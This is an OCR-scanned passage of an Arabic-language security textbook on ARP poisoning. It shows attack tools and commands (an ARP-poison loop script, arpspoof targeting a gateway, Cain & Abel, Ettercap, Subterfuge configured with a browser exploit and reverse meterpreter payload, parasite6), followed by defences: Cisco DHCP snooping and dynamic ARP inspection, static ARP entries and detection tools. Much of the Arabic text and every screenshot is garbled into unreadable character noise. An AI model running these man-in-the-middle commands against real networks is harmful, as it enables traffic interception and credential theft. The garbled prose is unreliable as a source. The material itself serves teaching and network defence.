root@tot : ~# echo 1 > /proc/sys/net/ipv4/ip_f orward 



icPVIS arp-poison.sh -W^ lA? ^j^* f 
#!/bin/bash 
while [l];do 

file2cable -i ethO -f arp-victim 
file2cable -i ethO -f arp-gateway 
sleep 2 
done 

^ J V i^ujJi ARP Cache ^) C 



L ^aujJlj Gateway c> l£ Jl ARP Reply JL-jj <jVl 



j <J£ gateway j > ^ J^j!^ * ^—^j^ chW^ ^ 



root@bt:-# ./arp-poison. sh 












f ile 2cable — toy FX <fx@phenoelit.de> 












Thanx got to Lamont Granquist 




f yodor 


for 


their 


hexdump ( > 


file 2 cable — toy FX <fx@phenoelit .de> 












Thanx got to Lamont Granquist 


& 


f yodor 


for 


the ir 


hexdump ( > 


file2cable — toy FX <fx@phenoelit .de> 












Thanx got to Lamont Granquist 




fyodor 


for 


the ir 


hexdump ( ) 
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.Cij j±ti\ ^ FTP ^ FTP ^ ipujall jl^ J ^ 4^Vll jl^ ^ sniffer J^j JjjL <> .Gateway 

■ARP Spoofing 

ARP Poisoning With Cain & Abel 

http://www.oxid.it : j^^il 

j °A3^ * ls jjljU JjiJull (Password Recovery) jj^t s^UU stat ^ Cain & Abel 
f j^a ^jj^ Liajl j ^j^JI ^ i^Uull aJ^JI cAl^JI ^(Sniffing) < "i >. Vnl t ^jjj j (ARP poison routing) APR 
SSH-1 ojLUI cjVj^jjjjJI L^J Igii^j (sniffer) c^i^ill .(man-in-the-middle) Ja^jll ^ J^j 
.(Jjjj jiil! CjU3! AjljujIj <c a ^Jjj jiill CjljUj/^UucVI J^jjt -lali^V jj^i iS j-^j 'HTTPSj 



_C1ujjj]| ^aLkJl wizard 4jUr. (J^f^ 3 ^ CIujIuj ^ jij 







File View Configure Tools Help 




| ^ © s? T tf iii^ SH ^ 


J + © S B „ Q IHI Bffl s « ® m | O f | XL 


^ Decoders |^ Network | Sniffer | Cracker |@ Traceroute | ffil CCDU | Cc & ,J Wireless | _ j Query | 


-i^i. Cached Passwords 
l-fjjjf Protected Storage 

j $$f LSA Secrets 

j— -9* Wireless Passwords 
j--^ IE 7/3/9 Passwords 
1- -4^] Windows Mail Passwords 

Dialup Passwords 
1 L-JEE Edit Boxes 

Enterprise Manager 

Credential Manager 

!--fl§l Windows Vault 


1 




Press the + button on the toolbar to dump the Protected Storage 












































































tffit Protected Storage | 


http ://www. oxi d . it 



cjIj^VI -^j^j ^ ^ j^- Configure i3j* lT^- l>* tilli ^jj ^ sniffing 4_Lg ^li l_a jjuj ^^jII a£jJo3I ^j^j] 

jj*^' <^ ls-^jj cs^j sniffer <ija j^W ?J aj <jV1 





File View Configure Tools Help 


JJ ^ | ^ © mJm |||hh ipsb| 


|| + ^1/ B 6i q iihi fw ^ w ^ m @ o ^ _B_ 


| ^ Decccleii | ^ Net.vcik | JjJ Sniffer | ^/ Cracker | Trace route | CCDU | ^ Wireless | _j Query | 


1 IP address 


MAC address 


OUI fingerprint Host name 


B ...| 


B... 




MO 


Ml 


M3 




1 19Z.1&3.1.1 


CO4AO0C6AOC0 


TP LINK TECHNOLOGIES C 




















1:192.163.1.100 


O01 3F75C33A7 


SMC Networks^ Inc. 




















































































































































































































































































































































































































































































































Hosts |© APR | *i* Routing | % Passwords | ^» VoIP | 




Lost packets: 0% 



643 



.AjIUII iiSUiJI jjjJa ls^' J (Ji^i <^ J ja. jaJI ^a dil -Iojjjj j ja. jA\ APR JjjS jai^j u^' f j*^ 

File View Configure Tools. Help 



a [^b © m^m nihh as j| + ^> I at | ^ 



Decoders | ^ Net.-.-crk | ^£ Sniffer | r^f Cracker |@ Traceroute | |fll CCDU | 'ffi Wi relets | >j Query | 




IP address | MAC address. | Packets. -> | <- Packets | MAC address | IP address 



-H I I t«J 
- Proxy HTTP S (0) I 



Status | IP address | MAC address | Packets -> | <- Packets | MAC address | IP addrt 



^ Configuration / Routed Packets 

| -gj Hcsts~| © APR | *j* Routing | j\ Pass ., ci ell | & VoIP |~ 



Lost packets: 0% 



4_iLc *bV IP AiUbj ^Iji^j ^> .1^ ARP Poisoning route + <ija jfclW p3 
.SPOOFING <M ^ © ^ iyVl ^ Ifi-aUl START/STOP APR c3> J&i ?jb *u ^ - 

ARP Poisoning Tool: Win Arp Attacker 

http://www.xfocus.net 

jtgjajj (j^a^a 4 j£ <lj dia &II a oU^i a< ^ ^ j^JIj jj jji^SI u^^* 4 ^ *j 5*^0^ WinArpAttacker 
IP ^Ijj^all ^ JLujjI 4 £ <>j 6 ARP Flooding ^ t — J ^'j^j ^ ^^Jc $\ ^>^1 

.cjVU^jVI Jjj^ ^5 (>j s (IP conflict packets) 



Sca^ Atfcac 


k Detect Optxns 


>'le-*v Help 


















New J^fT^ti 




M 1 


7>** ^» m G3 

S to p Seod B*i=9LLrf. 


im 

■ i =ii -.<■• 


I I 

| Lave Up | 


About 






IP Addles 


I Mat Address 


| Hostname 


I Onftne | Soiffioo 1 


Attddk 


i 


**pSQ 


1 ArpSP | ArpRO 


1 A-PBP 1 


Packets 


F^l io.o.o. i 
EI 1Q.O.O-3 
Q IQ.O.O.3 
El 10.O.O.4 


00-cra-5B • 
DO-67-E5 • 
00-15-5D 
OO-15-SD 


IO.O.O. 1 

W3N-MSSaCK4. . 
V.1MDOWSa 


Onkie Sraffing 

^Sfifene "Sni'rTb 
Onhie Stb fTwTg 


h*t*rrnal 
t*Jfmal 

Mormal 




8 
L 

s 

1 




5 Q 
-1 3 

2 e 

L 2. 


1 

1 

t 


□ 
O 
0 

a 


EI ia.0.0.5 


00-15-50 


W13SI -UC Qr4L3WV*t . . 


Orine Srtffwug 


Mormal 
Mormal 












□ 




D4-8E-DQ 


VJ1N-0 30MHSH... 






L 






3 


□ 


*l 
























I Event 


| ActHorst 


| Ef*esrtH«t ( Effett. 




i 






J£ Lsss ^| 


2012-08-Z8 0 3:lJOr30 P*ewv Hast 

20 1Z-OB-2S Q3£ 10:31 Loc«J_Arp_pntry 

20 15-OS-2B 03* 10 1 30 r#ew_Hosrt 

20 1 2-OS-2S O 3i lO r 340 r*ew_Ho*c 


IO.O.O. 1 
.Chonoe IO.O.O. 2 
10.0.0. 3 
IO.O.O. 4 


oo-oo-o... Do-e?- 

OO-IS-S... 


1 
1 
1 
1 








1.0.0.2 
lO-O- □ 1 
lO-O-O z 
lO-O-O. ^ 


66-66 * 
0Q-O9 • 
DO-6.7 - 
DO- IS - 




^.■j ± —j-a -^t» uj: ±u 




an 10.0.0.5 




!□ 






S|.— - 






I3S ~ i 12 03 ^S- ; — 






you can ifh- j - 2 W<WW 


















Readv 






lO.O.G.S Mac: OO-15-SD-A 




idW: 1D.O.Q. X On: G 


Off a Sriffk^o 







Arp Poisoning Tool: Ufasoft Snif 

http://ufasoft.com 

^Ijll a<^j ^jj^IV 1 AJj^l J2L-jj t> ^1 aJVI ARP Poisoning sbl ^ Ufasoft Snif 

ULLu, cjjl£) ICQ/IRC/MSN/email Sniffers ^ ^ j-3 ^1 P >ll JJ^ j ^ j .«iS3^ ^la 

A\ a£l±uA\ jjc ^jjj^IVI ^J^i C^^JJ 6 IRC 'ICQ (J^aij^cV 11a a - ^aj t(ICQ ^5^* (><u ^aHl] fil aJllo 
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IcqDumpj jll ^^i^JI IcqSnif :u' jl^-a) cfi*i yr^j 

.lJj^j l^j (jjjj^ Ufasoft Sniffer engine ^ g^j^t 



b ft m 
rt (If 



j£>-ZM X\2 , 
, - » i:i ■ 

Ac, 



**l .* :r i: -.. 



.- :« in ... 

*-» JOU., 

;r 21 .tij.. 



ir 1^- i.r r- " ■- i. ■ 

IH'»Mfe ■ Id^-ttM-rh-frhlb U' i 
I FY Mb MU-S4>-U-1H HI J»f > 
I .ii.. I ... =-L.L. - I 

IBft-.m-U.-:TrtVr*r*t*S»« 1 I 

jN<,«nn4*Wi mnwrjiw! , 
IrVriBft tf&SMM tafcrt*** P 
ir^wr j.. ■ - 4. . 




wiifeiMn.iDiw.-t 

Mb Jim. Ml," 1 a ! .' i 



Ufasoft Packet Snif Result 



: , "V Ci:l'« 1-=*- b<*P 



l"u-in- «Fipoofln| 



'■■ MM H3 l« 1W ; 
B - lad i op u.1 
y - tea wfl.J* 

P5. 1 " aim 

s< r <Hd i»T7 

• <B5 BKnw.K*.W-i 



V4- 1 ? 
-ivlH1 



5ft-Crt?f>l?17!.. 

ID-Qt-ZPUlTl.. 
■R Cft TT'P I.!. 
Jl-(*-»1f IT*. 



JB-W-Jein! iri r 



bm wIhj^Iw^ l«7,l«LI&U0iHHi K 
■M (FiiiriiKhilin lUMlHttHIt 
■JT. P^nL <rM.n «;.-«.lS*lM taH Tl 

Rm^.hi *h)-4MtlV.l*LlfkUNb<lM£ 
i» Ri^ r 1lt.TM.IUJ4r 

S«H FktirI JvM-hn iUMU^Jl 
••'TTtflnl-', l>t h.'WIVWWM 
■"-FT Hn^r I'J.-.'Cfl. IIEJ^.vM -W If » 

iW P«r^r IK? KM. za H ■ ■ »w 



3C>» FF Ff fT R FF Fl »«U[IIFbllUXai 

30 <l W » W W> =1 I* W V p^. ^.D A] Jkfi u 

OJLT> WUD 'jGUlWSd V J' 1 tt K cv n W 31 

■ W V Tl U U M W U » » » K 



Ufasoft Packet Snif Result 

tottp y/ufasoft.corfr 



Arp Poisoning Tool: arpspoof 

staVi . sbl (jiiijjjaJI aIij ^ a£j Mill jjj* '^j^ dL^aiil] l^l^kiajl ^1 sbVl arpspoof^ sbi 

. Jx^lj^l ^ ARP Reply j^jj^ J^J^ c> c-U^ arpspoof 
jjjL tsUij ^uai jSajj -L >Aii3 Jl£ tsljl^a. ^ IP Forward £^ ^arpspoof ^-l^l^l c> u' 

:root ^^">>i^ c^^^ plkcj 

#echo 1 > /proc/sys/net/ipv4/ip_forward 

;^JU]| \^ v ^ JUxijjll f\ iklui\ i ^ jiia ^arpspoof ^y*\j\ 

#arpspoof 

.4_JjLi3l C5 ic arpspoof ^I^^VI cjUuIxj q^jxj ^JL jjoj 11a 

.aJUII dilxi j1x-a3I UjJ (jj^J 4 JaslSI ^J^ 3 JH<^I Jl jhllU 

;^3U3! CjbljftVI ^ JjVl 

• MAC address: 00-50-56-C0-00-08 

• IP address: 192.168.65.1 

• Subnet mask: 255.255.255.0 

• MAC address: 00-0C-29-35-C9-CD 

• IP address: 192.168.65.129 

• Subnet mask: 255.255.255.0 

• MAC address: 00:0c:29:09:22:31 

• IP address: 192.168.65.130 

• Subnet mask: 255.255.255.0 

:^ j^ > ^ t JU^ ARP Cache ^ ^ 

Interface: 192.168.65.129 — 0x30002 

Internet Address Physical Address Type 
192.168.65.1 00-50-56-c0-00-08 dynamic 

: j*yt JU^b ^ .^jJI ji^ ARP Spoof *bV 

#arpspoof -t 192.168.65.129 192.168.65.1 
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jl .gateway ping jW^W Ckj^ gateway J^ 3 ^ *l j^j J j *^SjII o^*-? 

i^VIS p^ij <S ^ ARP Cache Jj^ 

Interface: 192.168.65.129 — 0x30002 

Internet Address Physical Address Type 
192.168.65.1 00-0c-29-09-22-31 dynamic 

q\ ^ill j c-29-09-22-310-00 J 1 cO-00-08-56-50-00 c> ^ MAC u» u» jW ^ 

.^V3U o^UJI MAC 



Other Arp Poisoning Tool for linux 

Arpoison *t 

http://www.arpoison.net : j^^il 

jli -stateless JjSjjjjj ARP Cj\ . ARP Reply ^ lUjj ls^I ja Arpoison 

.^ij^aiall j ^^ic ^-Ajli staVI .Dsniff jIj^' *y$- j& j .W^j^ j^*-* c£' ARP cache ^u^y ^ lS^-^I 

#arpoison -i <device> -d <dest IP> -s <src IP> -t <target MAC> -r <src MAC> 

Subterfuge *k 

https://code.google.eom/p/subterfuge/downloads/list 
.<Ljjudj l^ix^j t L^aHJ I Ja. j CjU^a pbV j^ixJI (Network Security Framework) jILJ y> 

s-a^ (credentials) ^Ujil /jUkl jljjt ARP u'j^ JjSjjjjj ^ < *<» > ^ l Jalij ^^jj Subterfuge 

6u AiJ cjUjjjj ^^a. Sjbl ^ Sj^lS .client-side browser injection i> ^Vl JIjj^I j '4^*11 iS^ill 

.Enter ti> jfcll ^ Subterfuge j ^ 



Terminal - root @u bun tu: - 




.Enter jj* j^j ^ c>j http://127.0.0.1:80 ^ ^" .. n j^l jt f jj^ ^ ^ 




Gfcrtmtta! HTTP Code Session Hijack 

Hjiv.".!«t Injection 

A* Q <S5| 



(e) 

Kvilorade Update 
Exploitation 



Subterfuge's HTTP Code Injection Module allows a user to 
inject payloads directly into a target's browsing session. 
Payloads can be anything from simple javascript/HTML 
injections to browser exploits. You even wnte your own injects. 
Running: m 

ie/ms10_02_aurora j 

Vector: 



Payload: meterpretef/reversejep j 
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:JN\£ tfj^Sfl <> ££a*1\ (> SlAl 6^ (J) LajI JaJ 

ARP Cache Poisoning 
Credential Harvester 
Http Code Injection 
Wireless AP Generation 
WPAD Hijacking 
Rogue DHCP 

Ettercap *k 

http ://ettercap . github . io/ettercap : j^-a^ll 
a1*\J> 40 ^ j Marco Valleri (NaGA) j Alberto Ornaghi (ALoR) <JaJ jt \ $*u^ ^ sbi ^ Ettercap 

JJ^j] CjI ^ ^jaxJI (j^aijj cjVj^jjjjJI c> ^Axll active and passive dissection .^Uua^U SjAaII 

^Jc. Ij^lS ^Aj^aja 4 11a (_3^J (jl ^J^J .-lajuo jll C-l^-J c^C- j (Jjjia (jo ARP J JJ^ ^ ^jli 4j] 

(Modify data connections) ^AjLJI JL^jI Jj^ 
■L* <SSH1 POP HTTP FTP ^VjSjojJI jj^l ^U^l - 
.^^11 HTTPS M^V * JJ> SSL c^hl^ ^ - 
^p, l-ALII 11a ^^lo <jL^.V1 ^ - c IP 0' j MAC Cf' lB-^ LaAio ARP ^ ci-^s 
jiS lij ^j^JI liA Jaxj lJj^j . ARP Spoofingj^ARP Poisoning ^ li* cs^j o- 3 ^ MAC u'j^ J-^jt c&j^ 

t^jllj ^curses mode 'text mode c-nLJ Ettercap Ettercap slJ u^iJ Jl£ jajj 

.GTK ^l^i^U cr^j^ 
JSlIIj Ettercap J^-^i 

Sniffing/Spoofing I Network Sniffers and select the Ettercap graphical 

i^VI <oLla (Jjjla ^ j ^ajjuj jll <^j=J jll g-i ettercap J^-^ 

#ettercap -G 

^Vl aoUL (jjjJa jo cillij aj^II yi ettercap J^-^ 

#ettercap -T 

;^VI <oUia JjjL jo cillij curses t^jll ^ ettercap J^-^ 

#ettercap -C 

Seringe 

http://www.securiteam.com/tools/5QP0I2AC0Lhtml : j^iJI 
c^oiJ I J!^k j^ t^lli ^jj .<j <^aUJ) s j^VI cj\ jjo ^ ARP Reply and Request ^Wl^ lP 3 

^1 sbVl > Seringe 

.ajaJ^jII "sniffers" t8>1 j^ u^j^^ ^5^* a£jJo3I ^ jjj-^^ ^j^- 

parasite6 *k 

^Uail aJ^aII jj^>^^ ^j^- lS^ s^loj (jj^ia jo t^lli j ARP Spoofing ^ j IPv6 L^J^*^^ f° J^^" sbVI 

.A-lla DOS "S^J MAC L^J^ t° C5J^^' *J^>^' diUlia (jjjia J^ ^ (J-aUJl 

4^UJI 4jL^I 

#parasite6 [-1RFHD] <interface> [fake-mac] 
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Option -1 loops and resends the packets per target every 5 seconds 
Option -R will also try to inject the destination of the solicitation 

Options NS security bypass: -F fragment, -H hop-by-hop and -D large destination header 

ARP-FILLUP - arp-sk - ARPOc - arpalert - arping - arpmitm - arpoison - ArpSpyX - ArpToXin - 
SwitchSniffer - Simsang 

(How To Defend Against ARP Poisoning) ARP Poisoning ^ <-^£ 



gjill jUVl s j±* if* DAI .dynamic ARP inspection (DAI) ^ ^> l^i* 4i3 jll jSaj ARP poisoning ? 
jjf. cjj^ VLAN <VLAN^ DAI ^ ARP ^> t> ^ 

6 J^Wj . DHCP snooping binding table^^^j ARP ? c> DAI .<^l JSI <iA** 
^ l)3 t DAIu^ DHCP snooping prioru^ ^) ■ DAIo£^ DHCP snooping prior 

.VLAN jW ysli j>J! J) c/Afc ^ 'y^kj -ARP ^ VLAN Sj^Vl o£ J^l 

DHCP s^lS ^ j <J JjULJ! MAC u> IP -^L* e DAI 6 ARP p>> i> lM i> 
<jl£ <j ^j^aLkJi jjc. MAC cl^ -W^^ IP j lij .^jjojUaII j <x»3^JI Aja. jj s^lc] Snooping 

Jaaa ^JL^ll cjUUlmVl j ARP ^A^ 3 u*>^j DAI ,< <>^Vi^l ^ J^j uL^> jta. Jjjj 4 C5 Hj11jj .ARP J*W^ DAI 



Implement Dynamic ARP Inspection Using DHCP Snooping Binding Table 



snooping binding 

Tpftddrcss Lease TVpc VIAtf Interface 



1 A — 



] 




10. io. io. i 
MAC A 



DHCP Snooping Enabled ■ 
Dynamic ARP Inspection Enabled -y 



10.10,10.2 

MAC B 



-j 



ARP 10.1D.1D.2 Saying 
ID. ID. 1 0- 1 i^MACC 



No ARP entry iin the 
binding table then 
discard the p^ckril 




ARP 10. 10.10. 1 
Spying lO. 10,10.2 
is MAC C 

I 



1 01 □. 105 
MACC 



Check the MAC and IP fields to see if the ARP 
from the interface is Jn the binding; if not, traffic 
is blocked 



] 



jiuuui cjLiLj^ ^4 Dynamic ARP Inspectionj Dhcp Snooping*^! 

DHCP DHCP Snooping ^> J\ Vj! «m DAI J^DHCP Snooping 0^ s-^ ^ ^ 

.l^j jjjj j* DHCP lSj^- j SjSlaj DHCP snooping binding J j U^A? ^ s j** ^Snooping 

^jiiijjjail] IP ^jjjUc t . iaxj j 4_ijU3l AifUl DHCP jjj-^^ ^j^- 1_3^ ^ g i£ sj aIslLj DHCP Snooping ^ j^jjoj lLjL^jjjjoj 

.(Port mapping) ^ 
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tlj^ jllj tjAal] (jj ^T . ^ l ^Jc DHCP Snooping u£*j t cjUii^ ^ DHCP Snooping ^] J^l (> 
jJ^I gjj .DHCP Snooping .VLAN 



Switch (conf ig) # <r±ti.<=r£} snooping 

Switch ( conf ig > # i- |p dhcp snooping ^vJL-mjrt O 

S wi_ t ( conf ig > # ^ Z 

Switchf sriow i-r> dhcp snooping 

Swd_tdrx OH CUE* s no op i_ racg - is enabled 

DHCP snooping is con^iguur-e^ on following VLAN 3; : i O 
DJHLdE* snooping is operat ional on f ollow^ing VIANs = O 
DHCP" snooping is conf igureci on "the: following L3 
I n t er f &. oe s : 

DMOI? snooping tru3t / rate is conf igu. reel on "the 
following Xnt er f a t^es s : 

IE nt er fa oe TjETu.st'ed Kate limit (ppa > 



<Lia3| ip dhcp snooping trust C&t^ ^ ^ajjIjII <Lia3l laaa Ja*j ^^jjoJI ^1 J jll jl£ lij 
Jj^ajll DHCP Responses u^jj^' <*j^ ^ <jA?* ^Wj^ c!^ 1 jV' ^W^j cJ^S c> * 

Jj^ ^J 2 ^ ^] IP ojj^ j f*J tiA^ DHCP ^j 1 ^ DHCP snooping binding Jj^ 

l^Jtill j^VI iiiiL ^ <DHCP snooping binding 

Switch* show ip dhcp snooping binding 

'MAC ojj^ d? J^i DHCP snooping binding J .DHCP snooping binding J o^j*-) 

:DHCP snooping binding J ^ Ujij .Jajl jj\ ^ ^ ^L^k 44J a1A1*1\ IP ojjUc 

Sntchf rhom ip dhcp vnooping binding 



snooping 0/? 

Total number of bindings : 1 

dynamic ARP inspection(DAI) ^) ^ ^ 'DHCP snooping binding Jj^ 4^ uj^ J 

r lSj ^j^j ^UUj c^jli VLANs & dynamic ARP inspection(DAI) J* ^ (i ) .VLAN 

VLAN 



Switch (oonf ig) # ±p arp inspection vlan 10 
Switch (config) # A Z 

Switch# show ip arp inspection 
Source Mao Validation : Disabled 

Destination Mao Validation : Disabled 
IP Address Validation : Disabled 

Vlan Configuration Operation ACL Match Static ACL 

10 Enabled Active 

Vlan ACL Logging DHCP Logging Probe Logging 

10 Deny Deny Off 

Vlan Forwarded Dropped DHCP Drops ACL Drops 

lO 0 0 O 0 

Vlan DHCP Permits ACL Permits Probe Permits Source MAC Failures 

lO 0 O 0 O 

Vlan Dest MAC Failures TP Validation Failures Invalid Protocol Data 

10 0 0 0 



4-uIa ^jSli^ 
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jo jUVl c> (j^j .4_Lk*^ ip jIjj&j <MAC Destination 'MAC Source ^ <ip arp inspection ^Vl jjU 
lo jiid ip arp inspection validate j^i^ t^Uij ^l£tt .AjaLjaVI £>i& CjL^ j^i ^ ji&l jl ^1 j ti^j^ 

fS c>j FastEtherneto/5 j VLAN 10 c> cWy (192.168.10.1) IP u'j^ ^ jo^> 

.iajoa jll ci^j ^ LS jJa\ jjflVI jj jl jII/a^ jjII uj^ j&Uaiill j <ARP Reply d^j!-? ^ j%i 
.DHCP snooping binding J f j^j 6 ^ ^ f dynamic ARP inspection o^j^ 
jti < JL^I ^ fl li) .FastEtherneto/5 ^ jj^l c> 192.168.10.1 j^ll IP u> jil^JI JjUj ^ 



%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Res) on FaO/5, vlan 10. 

{ [0013. 6050. acf4/192. 168 . 10 , 1/f f f f . f f f f , f f f f /192 . 168 . 10 . 1/05 : 37 : 31 UTC Mon 
M*r 1 2012]) 



(drop count) JalimVI i\ic> ^ s^Lj jll £>iA ^jj < ^ ^ ^ jaJt ^> ^1 JaUJ lij s^UjILj (drop count) -Sa^VI ±\ic> 

:show ip arp inspection j*Vl i^iiL> ^ i^tail ^ .dynamic ARP inspection gSli 



Switch* show ip arp inspection 



Source Keic Validation; Disabled 
Destination Ma. a Validation : Disabled 
IF Address Validation: Disabled 

Vlan Conf i gn rati on Operation ACL Ma ton. Static; Ik.CZ L 



IO £nabled Active 

Vlan ACL Logging DHCP Logging Probe Logging 



3_0 Deny Deny Off 

VI ^n Forwarded Dropped DHCP Drops ACL Drops 



IO 3 0 5 5 O 

Vlan DHCP Permits ACL Permits Ptot>e E-errni-tEi Source MAC Failures 

IO 30 O O O 

Vlan D-est MAC Failures IP Validation Failures Invalid Protoool Data 

IO O O O 



Static ARP Entries 

jli <>j statically ^ ARP Cache ^ (IP-to-MAC mappings) J^LJ! MAC u'j^ IP ^j 1 ^ 
^Lkj J^bu lit JUi>VI J^lSll ^Vl jajj (ajjIjII CjVU^VI) static entries c) .ARP Reply fj^ 5^ J*W43 * «j > ^ 1 
a£jjoJI IP- MAC ^ Ij^tj jl L— li^ ^Lijlull <jLi^ll j <^ l^^j^ W^!^ ^^j^ > ^ cJ^^ ^ixjoall 

; ^ILUI j^VI c> ^ (43 

#arp -s ip_address mac_address 

C:\>arp -a 

Interface: 192.168.1.137 — 0x60005 
Internet Address Physical Address Type 
192.168.1.30 20-cf-30-3a-f7-c9 static 
192.168.1.254 00-ld-7e-f8-23-d6 dynamic 

4-uIa ^jSli^ 
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OS SECURITY 



CjUIUI ^Vimj (j^J j 4-3 jc- j-a jjjc. Reply L$\ lI^W^ (jn^nl JllxJl (J-ijjuj ^^ic qVi-s ^ <J^-^ (Jclili (JjixjaLill *L<Jaj| 

.timeout ^ Jaia J^l^ ^ cjllu^il! JjL ^jV^ . (ARP Cache)^3>^ oj s <j j^Vl * j**Vl <> 



HKEY_LOCAL_MACHINE\SYSTEM\CuirentControlSet\Services\Tcpip\Parameters, ArpCacheLife, 
ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute, 
ArpRetryCount. 

.lJjjjSII (Windows-based spoofing prevention) jj^Jjlt JU^VI ^jU jajj AntiARP 

Jajl j^ji c^iii <^JL^a ialoij ^illj Linksys jtj j^j 2.6 &l J^ull ^Uaj ^ArpStar 

.repoison/heal jW^ ^ cSj^j 6 (violate mapping) 



ARP Spoofing Detection Software 



(4a i>j .ARP Replies ^W^' ^ ARP Spoofing * ^1 jJt 

aj^^Uj^Ij ajjIjII *\ jjuj IP ^jjjUc aaIsu i±=kj DHCP CjLuaiiH £>i& \ ^jjc- (j i> j^*-^ ARP ^ ^ aJLujI 

passive 5$-^ y?* ^ <-W a^jjj^ cjUl.ikiJ ^U^j <ARP Spoof ^ j^a ^ ^'j MAC u^j^ -W 5 

.ARP J ^ L - J '^^ cPjj^V^ ' j^*A' J^j^j ARP Reply ^ 

XArp i- 

http : //www . chri smc . de 

j^iaiti cjIa^j ;djLu£i3! (jp3l ^^ic c Lia£H 4_j3l iiLujj j .ARP ^-^^^ cjLl^JI (jc t a.^<u ^u^a>JI (j-<iVI (j^aj XArp 
ARP ^ J>^ (inspection modules) J^&\ cjI^j . (discoverers)u^ilxJlj (inspection modules) 

*j iaUjjj ^ (_3^"(discoverers) ^jjqun^^ll .I^j ^aLaJI cjULiJI ^cl JL L^jjjIL» J!>Lk l$liOL*a j ^ ^jSai Ti j 



acLujj tgil . ^jLoaI^aII lA^I iaLjib ^Lojjj (IP-MAC mappings) 3 ^j^ > ^>ti <LILJI MAC cl^j^ IP CttJ-^ 

A a Ajllz] CjUjJjoLd ^I^JjujU ARP daLa^J l^Lo^)J <JC^)i3l A£jjoJI ^j^a^il ^iflalill li^ ^I^JjojI ^jj! jjjoiaII .ARP 



!. Is - ^Wh'fHirhMWhrl^i! 



-'*>- ' i t' rr r ,> 



...... . - 



| ML 



i — r 



■:u co w 
r r - i-Li-sa 



Ufa JlKitf. , *wrt-*, I^lr 



'1 










22 - Sn^nrv " L 


- ■ — ■ - - - 






3 Z7..ZI] L2 



07;29;j5 



deatnetKirii-!?c cjf .a-p clIl^si uiy=i;u 



fa'j-ia =.■. = , 



OX* 

0Q- Qa-jl-Sff -IS -Si 

OKlDf 

out 

1*2. l*f .ll.LSS 
00-Dw-3»-rf-l3-*l 
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DefendARP *t 

http://www.arppoisoning.com/defense-scripts 
cjU^a ( ftj^S b DefendARP. lsL? J-^VI <>* ^la^ll -uuu^j host-based ARP Jj^ ^> J sbl y> 

^1^11 IP j MAC a* j ^poisoned entry ^ ' ^ 'ARP Poisoning 

.tiL (j-aUJI ARP Cache J V U c j^k^ jl£ lij till j^-yj jjjIIluJI jla tciUi AiLjaVU .clulj J j^. ^I^j ^ UhviJ 
MAC j IP <jt CP- ^-^j ^ j^ 3 fjl^il l_a jjoj ^^j^aill ^UjJI/ciujj£jajVl <jli ARP Poisoning cp- ^ li] 

Save this batch script as (defendarp.bat) and run with (defendarp.bat <IP Addr to defend>). 

HE Administrator: Root - defendARP.bat 10.10.13.1 I 1=1 i ^ I ^ J 



C:SUsersSfllanSDesktop>defendflEP.bat 10.10.13 .1 
INITIALIZING 

Removing 10.10.13.1 from ARP table. 
OK. 

Obtaining MAC address _ 
OK. 

Is 00-18-F8-3b-61-F5 the correct MAC For 10.10.13.1 <y^n>?y 
OK. 

Monitoring* your ARP table... 



ARP POISONED 

Spoofed IP: 10.10.13.1 

10. 10. 13.1 J s actual Physical Address: 00-18-F8-3b-61-F5 
Attcker J s Physical Address: 00-0c-29-28-4e-36 
Attempting to reset the correct Physical Address... 
ARP Table reset. 



a 



Monitoring your ARP table... 



anti-arpspoof *k 
arpwatch *t 

http://ee.lbl.gov 

Lo£ ,a£jjoJI ^^ic (jl j^Vl ^-ia Ui^jc ^^.Ld^ll ^ t . 1 o C5^] MAC u^j^ c ' IP ^—^j-^V^ <J u^j^- ^ j^^j - ^ 

.ARP Spoofing <*-Lu£l ARP JaUti ^ J j>^» 
diaj Ia jj^j ^jjj ^ jiiixJI <^a\\ CjLi^xi^)jj 6a£jjoJI cj j^kj <c ^ t^^-ila jll ^^Kj^ (jjdjljjl j/i^ ^ arpwatch > ^ j ^ 

BSD ^-^j 

#arpwatch -i ethO 

#tail -f /var/log/messages 



# -u <usernancie> : defines with what user id arpwatch should run 

# -e <ernail> : the <email> where to send the reports 

# -s <from> : the <from>- address 

OPTIONS= n -u arpwatch -e tecmintitecMiint . com -s "root (Arpwatch) 1 " 
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ArpON <t 

±± qJuH (Portable handler daemon) <_b*^ j* 

ARP Spoofing - 

cache poisoning or poison routing attacks in static, dynamic and hybrid networks - 

Other 



Antidote - Arp_Antidote - Arpalert - Arpwatch/ArpwatchNG/Winarpwatch - Prelude IDS - Snort 



Name 


ft C 

Ua 




Free 


Protection 


Per 
interface 


Active/pa s s i ve 


Agnitum Outpost 
Firewall 


Windows 


Yes 


No 


Yes 


No 


passive 


AntiARP 


Windows 


Yes 


No 


Yes 




active+passive 


Antidote 


Linux 


No 


Yes 


No 


? 


passive 


Arp_Antidote 


Linux 


No 


Yes 


No 


? 


passive 


Arpalert 


Linux 


No 


Yes 


No 


Yes 


passive 


ArpON 


Linux/Mac/BSD 


No 


Yes 


Yes 


Yes 


active+passive 


ArpGuard 


Mac 


Yes 


No 


Yes 


Yes 


active+passive 


ArpStar 


Linux 


No 


Yes 


Yes 


? 


passive 


Arpwatch 


Linux 


No 


Yes 


No 


Yes 


passive 


ArpwatchNG 


Linux 


No 


Yes 


No 


No 


passive 


Colasoft Capsa 


Windows 


Yes 


No 


No 


Yes 


no detection, only analysis with manual inspection 


Prelude IDS 


•? 


? 


•? 


? 


? 


•? 


remarp 


Linux 


No 


Yes 






passive 


Snort 


Windows/Linux 


No 


Yes 


No 


Yes 


passive 


Win arpwatch 


Windows 


No 


Yes 


No 


No 


passive 


XArp [121 


Windows, Linux 


Yes 


Yes (+pro 
version) 


Yes (Linux, 
pro) 


Yes 


active + passive 


Seconfi g XP 


Windows 2000/XP/2003 
only 


Yes 


Yes 


Yes 


Ho 


only activates protection built-in some versions of 
Windows 



(Spoofing Attack) J^VI 8.5 



cjU^a J&\ii jVl .ARP Poisoningj 'DHCP MAC 'sniffing ^ 

'MAC spoofing/duplicating < d^*^ cjU^JI ^ cjIau$j3I jjn m 4<^l\ cjULj ^ ( "i^nll ^l^kJI 

.MAC spoofing ^ ^liJI aJLjL j <IRDP spoofing *3 qfo spoofing j 
(Jbl^VI ^jaA 4aj111I cjU^I) Spoofing Attack Threats 
MAC Spoofing ^ J ^ ^jj^^^ u^W^ ^ ^ ^ Spoofing 

